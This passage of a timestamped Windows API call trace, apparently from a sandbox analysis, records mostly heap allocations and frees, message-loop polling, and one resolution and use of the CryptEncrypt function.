returned 0x2e504d0 [0214.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0214.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0214.166] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xb494) returned 0x2f24018 [0214.699] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0214.699] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c48 [0214.699] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0214.699] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0214.699] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0214.699] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c68 [0214.699] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0214.699] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0214.699] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0214.699] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54be8 [0214.700] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0214.700] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0214.700] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0214.700] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50578 [0214.700] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54120 [0214.700] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0214.700] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0214.700] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0214.700] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0214.700] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xb494) returned 0x2f3a958 [0214.702] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544b8 [0214.702] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0214.702] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0214.703] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0214.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54508 [0214.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0214.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54210 [0214.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0214.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0214.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0214.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0214.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0214.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0214.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0214.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0214.703] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 1 [0214.703] TranslateMessage (lpMsg=0x8cf3b8) returned 0 [0214.703] DispatchMessageW (lpMsg=0x8cf3b8) returned 0x0 [0214.703] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0214.703] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0214.705] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0214.705] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0214.705] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0214.705] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0214.705] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0214.705] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0214.705] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0214.705] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0214.705] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0214.705] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0214.705] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0214.705] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0214.705] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0214.706] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0214.706] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0214.706] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0214.706] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0214.706] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0214.706] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0214.706] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0214.706] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0214.706] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0214.706] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0214.706] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0214.706] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0214.706] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0214.707] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0214.707] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0214.707] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ff48 | out: hHeap=0x970000) returned 1 [0214.707] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0214.707] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0214.707] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0214.707] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77ac8 | out: hHeap=0x970000) returned 1 [0214.707] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0214.707] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0214.707] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ffb8 | out: hHeap=0x970000) returned 1 [0214.707] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0214.707] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0214.707] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0214.707] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0214.707] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0214.707] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0214.707] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0214.708] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0214.708] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0214.708] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b08 | out: hHeap=0x970000) returned 1 [0214.708] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0214.708] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0214.708] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fe30 | out: hHeap=0x970000) returned 1 [0214.708] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0214.708] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0214.711] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0214.711] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0214.711] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e50c38, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0214.711] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0214.712] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0214.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0214.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0214.712] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1c) returned 0x2e543f0 [0214.712] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0214.712] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0214.712] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0214.712] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0214.712] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0214.712] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0214.712] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0214.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0214.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0214.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0214.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0214.713] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0214.713] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0214.713] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0214.713] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543f0 | out: hHeap=0x970000) returned 1 [0214.713] CryptEncrypt (in: hKey=0xa87110, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0xb494, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0xb498) returned 1 [0214.713] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0214.713] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0214.713] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0214.713] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0214.714] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0214.714] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0214.714] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0214.714] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0214.714] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0214.714] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0214.715] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0214.715] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0214.715] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0214.715] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0214.715] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0214.715] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0214.715] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0214.715] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0214.715] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0214.715] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0214.715] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0214.715] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0214.715] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0214.715] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0214.715] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0214.715] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0214.715] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0214.715] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0214.715] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0214.715] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0214.715] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0214.715] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0214.716] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0214.716] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0214.716] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0214.716] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0214.716] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0214.716] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0214.716] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0214.716] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0214.716] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0214.716] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0214.716] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0214.716] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0214.716] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0214.716] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0214.716] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0214.716] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0214.716] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0214.716] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0214.716] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0214.716] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0214.716] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0214.717] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0214.717] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0214.717] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0214.717] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0214.717] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0214.717] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0214.717] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0214.717] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0214.717] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0214.717] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0214.717] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0214.717] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0214.717] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0214.717] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0214.717] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0214.717] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0214.717] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0214.717] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0214.717] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0214.717] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0214.717] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0214.717] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0214.717] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0214.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0214.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0214.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0214.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0214.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0214.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0214.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0214.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0214.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0214.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0214.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0214.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0214.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0214.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0214.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0214.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0214.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0214.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0214.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0214.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56430 | out: hHeap=0x970000) returned 1 [0214.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0214.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0214.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0214.719] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0214.719] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0214.719] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0214.719] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0214.719] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0214.719] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0214.719] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0214.719] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0214.719] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0214.719] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0214.719] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0214.719] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0214.719] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0214.719] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: 